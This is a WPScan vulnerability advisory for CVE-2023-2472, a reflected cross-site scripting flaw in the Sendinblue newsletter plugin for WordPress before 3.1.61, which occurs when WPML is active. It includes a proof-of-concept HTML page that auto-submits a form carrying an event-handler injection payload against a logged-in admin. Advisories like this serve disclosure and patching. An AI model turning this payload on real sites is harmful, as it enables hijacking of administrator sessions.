WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.61 - Reflected XSS

Description

The plugin does not sanitise and escape a parameter before outputting it back in the admin dashboard when the WPML plugin is also active and configured, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page containing the code below (the WPML, slug: sitepress-multilingual-cms, needs to be active and configured as well. The ID is a translated form ID)

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=sib_page_form&action=edit&id=1" method="POST">
      <input type="hidden" name="page" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

mailin
Fixed in version 3.1.61

References

CVE
CVE-2023-2472

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID
b0e7665a-c8c3-4132-b8d7-8677a90118df

Timeline

Publicly Published

2023-05-15 (about 4 months ago)

Added

2023-05-15 (about 4 months ago)

Last Updated

2023-05-15 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin